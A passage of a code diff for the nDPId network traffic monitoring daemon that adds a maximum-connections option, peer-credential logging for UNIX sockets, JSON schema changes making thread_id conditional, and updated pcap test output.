current->event_distributor_un.user_name = NULL;
} }
current->fd = -1; current->fd = -1;
remotes.desc_used--; remotes.desc_used--;
@@ -601,7 +636,7 @@ static int nDPIsrvd_parse_options(int argc, char ** argv)
{ {
int opt; int opt;
while ((opt = getopt(argc, argv, "lL:c:dp:s:S:u:g:C:Dvh")) != -1) while ((opt = getopt(argc, argv, "lL:c:dp:s:S:m:u:g:C:Dvh")) != -1)
{ {
switch (opt) switch (opt)
{ {
@@ -633,6 +668,13 @@ static int nDPIsrvd_parse_options(int argc, char ** argv)
free(nDPIsrvd_options.distributor_in_address); free(nDPIsrvd_options.distributor_in_address);
nDPIsrvd_options.distributor_in_address = strdup(optarg); nDPIsrvd_options.distributor_in_address = strdup(optarg);
break; break;
case 'm':
if (str_value_to_ull(optarg, &nDPIsrvd_options.max_remote_descriptors) != CONVERSION_OK)
{
fprintf(stderr, "%s: Argument for `-C' is not a number: %s\n", argv[0], optarg);
return 1;
}
break;
case 'u': case 'u':
free(nDPIsrvd_options.user); free(nDPIsrvd_options.user);
nDPIsrvd_options.user = strdup(optarg); nDPIsrvd_options.user = strdup(optarg);
@@ -660,7 +702,7 @@ static int nDPIsrvd_parse_options(int argc, char ** argv)
fprintf(stderr, fprintf(stderr,
"Usage: %s [-l] [-L logfile] [-c path-to-unix-sock] [-d] [-p pidfile]\n" "Usage: %s [-l] [-L logfile] [-c path-to-unix-sock] [-d] [-p pidfile]\n"
"\t[-s path-to-distributor-unix-socket] [-S distributor-host:port]\n" "\t[-s path-to-distributor-unix-socket] [-S distributor-host:port]\n"
"\t[-u user] [-g group]\n" "\t[-m max-remote-descriptors] [-u user] [-g group]\n"
"\t[-C max-buffered-collector-json-lines] [-D]\n" "\t[-C max-buffered-collector-json-lines] [-D]\n"
"\t[-v] [-h]\n", "\t[-v] [-h]\n",
argv[0]); argv[0]);
@@ -734,10 +776,10 @@ static struct remote_desc * accept_remote(int server_fd,
return NULL; return NULL;
} }
struct remote_desc * current = get_unused_remote_descriptor(socktype, client_fd, NETWORK_BUFFER_MAX_SIZE); struct remote_desc * current = get_remote_descriptor(socktype, client_fd, NETWORK_BUFFER_MAX_SIZE);
if (current == NULL) if (current == NULL)
{ {
logger(1, "Max number of connections reached: %zu", remotes.desc_used); logger(1, "Max number of connections reached: %llu", remotes.desc_used);
return NULL; return NULL;
} }
@@ -791,7 +833,6 @@ static int new_connection(int epollfd, int eventfd)
case COLLECTOR_UN: case COLLECTOR_UN:
current->event_collector_un.peer = sockaddr.saddr_collector_un; current->event_collector_un.peer = sockaddr.saddr_collector_un;
current->event_collector_un.json_bytes = 0; current->event_collector_un.json_bytes = 0;
logger(1, "New collector connection");
sockopt = NETWORK_BUFFER_MAX_SIZE; sockopt = NETWORK_BUFFER_MAX_SIZE;
if (setsockopt(current->fd, SOL_SOCKET, SO_RCVBUF, &sockopt, sizeof(sockopt)) < 0) if (setsockopt(current->fd, SOL_SOCKET, SO_RCVBUF, &sockopt, sizeof(sockopt)) < 0)
@@ -799,12 +840,49 @@ static int new_connection(int epollfd, int eventfd)
logger(1, "Error setting socket option SO_RCVBUF: %s", strerror(errno)); logger(1, "Error setting socket option SO_RCVBUF: %s", strerror(errno));
return 1; return 1;
} }
struct ucred ucred = {};
socklen_t ucred_len = sizeof(ucred);
if (getsockopt(current->fd, SOL_SOCKET, SO_PEERCRED, &ucred, &ucred_len) == -1)
{
logger(1, "Error getting credentials from UNIX socket: %s", strerror(errno));
return 1;
}
current->event_collector_un.pid = ucred.pid;
logger_nDPIsrvd(current, "New collector connection from", "");
break; break;
case DISTRIBUTOR_UN: case DISTRIBUTOR_UN:
case DISTRIBUTOR_IN: case DISTRIBUTOR_IN:
if (current->sock_type == DISTRIBUTOR_UN) if (current->sock_type == DISTRIBUTOR_UN)
{ {
current->event_distributor_un.peer = sockaddr.saddr_distributor_un; current->event_distributor_un.peer = sockaddr.saddr_distributor_un;
struct ucred ucred = {};
socklen_t ucred_len = sizeof(ucred);
if (getsockopt(current->fd, SOL_SOCKET, SO_PEERCRED, &ucred, &ucred_len) == -1)
{
logger(1, "Error getting credentials from UNIX socket: %s", strerror(errno));
return 1;
}
struct passwd pwnam = {};
struct passwd * pwres = NULL;
ssize_t pwsiz = sysconf(_SC_GETPW_R_SIZE_MAX);
if (pwsiz == -1)
{
pwsiz = BUFSIZ;
}
char buf[pwsiz];
if (getpwuid_r(ucred.uid, &pwnam, &buf[0], pwsiz, &pwres) != 0)
{
logger(1, "Could not get passwd entry for user id %u", ucred.uid);
return 1;
}
current->event_distributor_un.pid = ucred.pid;
current->event_distributor_un.user_name = strdup(pwres->pw_name);
} }
else else
{ {
@@ -816,6 +894,15 @@ static int new_connection(int epollfd, int eventfd)
logger(1, "Error setting socket option SO_RCVBUF: %s", strerror(errno)); logger(1, "Error setting socket option SO_RCVBUF: %s", strerror(errno));
return 1; return 1;
} }
if (inet_ntop(current->event_distributor_in.peer.sin_family,
&current->event_distributor_in.peer.sin_addr,
&current->event_distributor_in.peer_addr[0],
sizeof(current->event_distributor_in.peer_addr)) == NULL)
{
logger(1, "Error converting an internet address: %s", strerror(errno));
return 1;
}
} }
sockopt = NETWORK_BUFFER_MAX_SIZE; sockopt = NETWORK_BUFFER_MAX_SIZE;
@@ -825,19 +912,6 @@ static int new_connection(int epollfd, int eventfd)
return 1; return 1;
} }
if (inet_ntop(current->event_distributor_in.peer.sin_family,
&current->event_distributor_in.peer.sin_addr,
&current->event_distributor_in.peer_addr[0],
sizeof(current->event_distributor_in.peer_addr)) == NULL)
{
if (errno != EAFNOSUPPORT)
{
logger(1, "Error converting an internet address: %s", strerror(errno));
}
current->event_distributor_in.peer_addr[0] = '\0';
}
logger_distributor(current, "New distributor connection from", "%d", current->fd);
{ {
struct timeval send_timeout = {1, 0}; struct timeval send_timeout = {1, 0};
if (setsockopt(current->fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&send_timeout, sizeof(send_timeout)) != 0) if (setsockopt(current->fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&send_timeout, sizeof(send_timeout)) != 0)
@@ -845,13 +919,15 @@ static int new_connection(int epollfd, int eventfd)
logger(1, "Error setting socket option send timeout: %s", strerror(errno)); logger(1, "Error setting socket option send timeout: %s", strerror(errno));
} }
} }
logger_nDPIsrvd(current, "New distributor connection from", "");
break; break;
} }
/* nonblocking fd is mandatory */ /* nonblocking fd is mandatory */
if (fcntl_add_flags(current->fd, O_NONBLOCK) != 0) if (fcntl_add_flags(current->fd, O_NONBLOCK) != 0)
{ {
logger(1, "Error setting fd flags: %s", strerror(errno)); logger(1, "Error setting fd flags to non-blocking mode: %s", strerror(errno));
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
@@ -880,7 +956,10 @@ static int handle_collector_protocol(int epollfd, struct remote_desc * const cur
if (current->buf.ptr.text[NETWORK_BUFFER_LENGTH_DIGITS] != '{') if (current->buf.ptr.text[NETWORK_BUFFER_LENGTH_DIGITS] != '{')
{ {
logger(1, "BUG: JSON invalid opening character: '%c'", current->buf.ptr.text[NETWORK_BUFFER_LENGTH_DIGITS]); logger_nDPIsrvd(current,
"BUG: Collector connection",
"JSON invalid opening character: '%c'",
current->buf.ptr.text[NETWORK_BUFFER_LENGTH_DIGITS]);
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
@@ -891,33 +970,40 @@ static int handle_collector_protocol(int epollfd, struct remote_desc * const cur
if (errno == ERANGE) if (errno == ERANGE)
{ {
logger(1, "BUG: Size of JSON exceeds limit"); logger_nDPIsrvd(current, "BUG: Collector connection", "JSON string length exceeds numceric limits");
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
if (json_str_start == current->buf.ptr.text) if (json_str_start == current->buf.ptr.text)
{ {
logger(1, logger_nDPIsrvd(current,
"BUG: Missing size before JSON string: \"%.*s\"", "BUG: Collector connection",
NETWORK_BUFFER_LENGTH_DIGITS, "missing JSON string length in protocol preamble: \"%.*s\"",
current->buf.ptr.text); NETWORK_BUFFER_LENGTH_DIGITS,
current->buf.ptr.text);
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
if (json_str_start - current->buf.ptr.text != NETWORK_BUFFER_LENGTH_DIGITS) if (json_str_start - current->buf.ptr.text != NETWORK_BUFFER_LENGTH_DIGITS)
{ {
logger(1, logger_nDPIsrvd(current,
"BUG: Invalid collector protocol data received. Expected protocol preamble of size %u bytes, got %ld " "BUG: Collector connection",
"bytes", "invalid collector protocol data received. Expected protocol preamble of size %u bytes, got "
NETWORK_BUFFER_LENGTH_DIGITS, "%ld "
(long int)(json_str_start - current->buf.ptr.text)); "bytes",
NETWORK_BUFFER_LENGTH_DIGITS,
(long int)(json_str_start - current->buf.ptr.text));
} }
if (current->event_collector_un.json_bytes > current->buf.max) if (current->event_collector_un.json_bytes > current->buf.max)
{ {
logger(1, "BUG: JSON string too big: %llu > %zu", current->event_collector_un.json_bytes, current->buf.max); logger_nDPIsrvd(current,
"BUG: Collector connection",
"JSON string too big: %llu > %zu",
current->event_collector_un.json_bytes,
current->buf.max);
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
@@ -930,7 +1016,11 @@ static int handle_collector_protocol(int epollfd, struct remote_desc * const cur
if (current->buf.ptr.text[current->event_collector_un.json_bytes - 2] != '}' || if (current->buf.ptr.text[current->event_collector_un.json_bytes - 2] != '}' ||
current->buf.ptr.text[current->event_collector_un.json_bytes - 1] != '\n') current->buf.ptr.text[current->event_collector_un.json_bytes - 1] != '\n')
{ {
logger(1, "BUG: Invalid JSON string: %.*s", (int)current->event_collector_un.json_bytes, current->buf.ptr.text); logger_nDPIsrvd(current,
"BUG: Collector connection",
"invalid JSON string: %.*s",
(int)current->event_collector_un.json_bytes,
current->buf.ptr.text);
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
@@ -946,11 +1036,11 @@ static int handle_incoming_data(int epollfd, struct remote_desc * const current)
if (read(current->fd, &garbage, sizeof(garbage)) == sizeof(garbage)) if (read(current->fd, &garbage, sizeof(garbage)) == sizeof(garbage))
{ {
logger_distributor(current, "Received data from", "%d which is not allowed to send us some.", current->fd); logger_nDPIsrvd(current, "Received data from", "who is not allowed to send us some.");
} }
else else
{ {
logger_distributor(current, "Distributor connection", "%d closed", current->fd); logger_nDPIsrvd(current, "Distributor connection", "closed");
} }
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
@@ -959,7 +1049,10 @@ static int handle_incoming_data(int epollfd, struct remote_desc * const current)
/* read JSON strings (or parts) from the UNIX socket (collecting) */ /* read JSON strings (or parts) from the UNIX socket (collecting) */
if (current->buf.used == current->buf.max) if (current->buf.used == current->buf.max)
{ {
logger(1, "Collector read buffer full. No more read possible."); logger_nDPIsrvd(current,
"Collector connection",
"read buffer (%zu bytes) full. No more read possible.",
current->buf.max);
} }
else else
{ {
@@ -968,13 +1061,13 @@ static int handle_incoming_data(int epollfd, struct remote_desc * const current)
read(current->fd, current->buf.ptr.raw + current->buf.used, current->buf.max - current->buf.used); read(current->fd, current->buf.ptr.raw + current->buf.used, current->buf.max - current->buf.used);
if (bytes_read < 0 || errno != 0) if (bytes_read < 0 || errno != 0)
{ {
logger(1, "Could not read remote: %s", strerror(errno)); logger_nDPIsrvd(current, "Could not read remote", ": %s", strerror(errno));
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
if (bytes_read == 0) if (bytes_read == 0)
{ {
logger(0, "Collector connection closed during read"); logger_nDPIsrvd(0, "Collector connection", "closed during read");
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
return 1; return 1;
} }
@@ -1005,7 +1098,7 @@ static int handle_incoming_data(int epollfd, struct remote_desc * const current)
if (utarray_len(remotes.desc[i].buf_cache) == 0) if (utarray_len(remotes.desc[i].buf_cache) == 0)
{ {
#if 0 #if 0
logger_distributor(&remotes.desc[i], logger_nDPIsrvd(&remotes.desc[i],
"Distributor", "Distributor",
"buffer capacity threshold (%zu bytes) reached, caching JSON strings.", "buffer capacity threshold (%zu bytes) reached, caching JSON strings.",
remotes.desc[i].buf.used); remotes.desc[i].buf.used);
@@ -1013,7 +1106,10 @@ static int handle_incoming_data(int epollfd, struct remote_desc * const current)
errno = 0; errno = 0;
if (add_out_event(epollfd, &remotes.desc[i]) != 0) if (add_out_event(epollfd, &remotes.desc[i]) != 0)
{ {
logger(1, "%s: %s", "Could not add event, disconnecting", strerror(errno)); logger_nDPIsrvd(&remotes.desc[i],
"Could not add event to",
", disconnecting: %s",
strerror(errno));
disconnect_client(epollfd, &remotes.desc[i]); disconnect_client(epollfd, &remotes.desc[i]);
continue; continue;
} }
@@ -1134,11 +1230,11 @@ static int mainloop(int epollfd)
switch (current->sock_type) switch (current->sock_type)
{ {
case COLLECTOR_UN: case COLLECTOR_UN:
logger(1, "Collector disconnected: %d", current->fd); logger_nDPIsrvd(current, "Collector disconnected", "closed");
break; break;
case DISTRIBUTOR_UN: case DISTRIBUTOR_UN:
case DISTRIBUTOR_IN: case DISTRIBUTOR_IN:
logger_distributor(current, "Distributor connection", "closed"); logger_nDPIsrvd(current, "Distributor connection", "closed");
break; break;
} }
disconnect_client(epollfd, current); disconnect_client(epollfd, current);
@@ -1193,7 +1289,7 @@ static int mainloop(int epollfd)
close(signalfd); close(signalfd);
free_remote_descriptor_data(); free_remotes();
return 0; return 0;
} }
@@ -1245,10 +1341,10 @@ static void close_event_queue(int epollfd)
close(epollfd); close(epollfd);
} }
static int setup_remote_descriptors(size_t max_descriptors) static int setup_remote_descriptors(nDPIsrvd_ull max_remote_descriptors)
{ {
remotes.desc_used = 0; remotes.desc_used = 0;
remotes.desc_size = max_descriptors; remotes.desc_size = max_remote_descriptors;
remotes.desc = (struct remote_desc *)nDPIsrvd_calloc(remotes.desc_size, sizeof(*remotes.desc)); remotes.desc = (struct remote_desc *)nDPIsrvd_calloc(remotes.desc_size, sizeof(*remotes.desc));
if (remotes.desc == NULL) if (remotes.desc == NULL)
{ {
@@ -1286,7 +1382,7 @@ int main(int argc, char ** argv)
"%s", "%s",
"Daemon mode `-d' and `-l' can not be used together, " "Daemon mode `-d' and `-l' can not be used together, "
"because stdout/stderr is beeing redirected to /dev/null"); "because stdout/stderr is beeing redirected to /dev/null");
retval = 1; return 1;
} }
if (access(nDPIsrvd_options.collector_un_sockpath, F_OK) == 0) if (access(nDPIsrvd_options.collector_un_sockpath, F_OK) == 0)
@@ -1314,7 +1410,7 @@ int main(int argc, char ** argv)
goto error; goto error;
} }
if (setup_remote_descriptors(32) != 0) if (setup_remote_descriptors(nDPIsrvd_options.max_remote_descriptors) != 0)
{ {
goto error; goto error;
} }

25
schema/basic_event_schema.json
View File

@@ -3,7 +3,6 @@
"required": [ "required": [
"alias", "alias",
"source", "source",
"thread_id",
"packet_id", "packet_id",
"basic_event_id", "basic_event_id",
"basic_event_name", "basic_event_name",
@@ -15,14 +14,20 @@
"properties": { "basic_event_name": { "enum": [ "Unknown datalink layer packet", "Unknown packet type" ] } } "properties": { "basic_event_name": { "enum": [ "Unknown datalink layer packet", "Unknown packet type" ] } }
}, },
"then": { "then": {
"required": [ "layer_type" ] "anyOf": [
{ "required": [ "layer_type" ] },
{ "not": { "required": [ "thread_id" ] } }
]
}, },
"if": { "if": {
"properties": { "basic_event_name": { "enum": [ "Unknown L3 protocol" ] } } "properties": { "basic_event_name": { "enum": [ "Unknown L3 protocol" ] } }
}, },
"then": { "then": {
"required": [ "protocol" ] "anyOf": [
{ "required": [ "protocol" ] },
{ "not": { "required": [ "thread_id" ] } }
]
}, },
"if": { "if": {
@@ -32,28 +37,34 @@
"Captured packet size is smaller than expected packet size" ] } } "Captured packet size is smaller than expected packet size" ] } }
}, },
"then": { "then": {
"required": [ "size", "expected" ] "anyOf": [
{ "required": [ "size", "expected" ] },
{ "not": { "required": [ "thread_id" ] } }
]
}, },
"if": { "if": {
"properties": { "basic_event_name": { "enum": [ "Packet header invalid" ] } } "properties": { "basic_event_name": { "enum": [ "Packet header invalid" ] } }
}, },
"then": { "then": {
"required": [ "raeson" ] "anyOf": [
{ "required": [ "raeson" ] },
{ "not": { "required": [ "thread_id" ] } }
]
}, },
"if": { "if": {
"properties": { "basic_event_name": { "enum": [ "Flow memory allocation failed" ] } } "properties": { "basic_event_name": { "enum": [ "Flow memory allocation failed" ] } }
}, },
"then": { "then": {
"required": [ "size" ] "required": [ "thread_id", "size" ]
}, },
"if": { "if": {
"properties": { "basic_event_name": { "enum": [ "Max flows to track reached" ] } } "properties": { "basic_event_name": { "enum": [ "Max flows to track reached" ] } }
}, },
"then": { "then": {
"required": [ "current_active", "current_idle", "max_active", "max_idle" ] "required": [ "thread_id", "current_active", "current_idle", "max_active", "max_idle" ]
}, },
"properties": { "properties": {

6
schema/packet_event_schema.json
View File

@@ -3,7 +3,6 @@
"required": [ "required": [
"alias", "alias",
"source", "source",
"thread_id",
"packet_id", "packet_id",
"packet_event_id", "packet_event_id",
"packet_event_name", "packet_event_name",
@@ -25,7 +24,10 @@
"properties": { "packet_event_name": { "enum": ["packet-flow"] } } "properties": { "packet_event_name": { "enum": ["packet-flow"] } }
}, },
"then": { "then": {
"required": [ "flow_id", "flow_packet_id", "flow_last_seen", "flow_idle_time" ] "required": [ "thread_id", "flow_id", "flow_packet_id", "flow_last_seen", "flow_idle_time" ]
},
"else": {
"not": { "required": [ "thread_id", "flow_id", "flow_packet_id", "flow_last_seen", "flow_idle_time" ] }
}, },
"properties": { "properties": {

26
test/results/4in4tunnel.pcap.out
View File

@@ -1,19 +1,19 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"4in4tunnel.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"4in4tunnel.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1537044271794} 00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1537044271794}
00505{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJToWAAA\/wQRSEVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGxLmgACAAAEc2wQAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="} 00491{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJToWAAA\/wQRSEVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGxLmgACAAAEc2wQAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="}
00201{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537044271794} 00187{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537044271794}
00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":2,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":5,"global_ts_msec":1537058551803} 00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":2,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":5,"global_ts_msec":1537058551803}
00505{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJRbZwAA\/wSeOUVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGzGjAACAAAAJvVqAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="} 00491{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJRbZwAA\/wSeOUVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGzGjAACAAAAJvVqAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="}
00201{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537058551803} 00187{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537058551803}
00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":8,"global_ts_msec":1537082929816} 00468{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":8,"global_ts_msec":1537082929816}
00505{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJRsDwAA\/wSNkUVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGzKXAACAAABmvAmAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="} 00491{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJRsDwAA\/wSNkUVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGzKXAACAAABmvAmAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="}
00201{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537082929816} 00187{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537082929816}
00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":11,"global_ts_msec":1537138237839} 00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4,"source":"4in4tunnel.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":11,"global_ts_msec":1537138237839}
00505{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJRnMwAA\/wSSbUVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGzXzgACAAAE5t9oAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="} 00491{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"4in4tunnel.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":170,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":170,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAAEpMZPO7OagQBmWIEAYfkIAEW4AJRnMwAA\/wSSbUVDI5Ipyi5uRbgAgAABAAD+Ed6ECgpkGQoKZQLzn0JoAGzXzgACAAAE5t9oAAAAAAABAACrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq80="}
00201{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":4,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537138237839} 00187{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"4in4tunnel.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1537138237839}
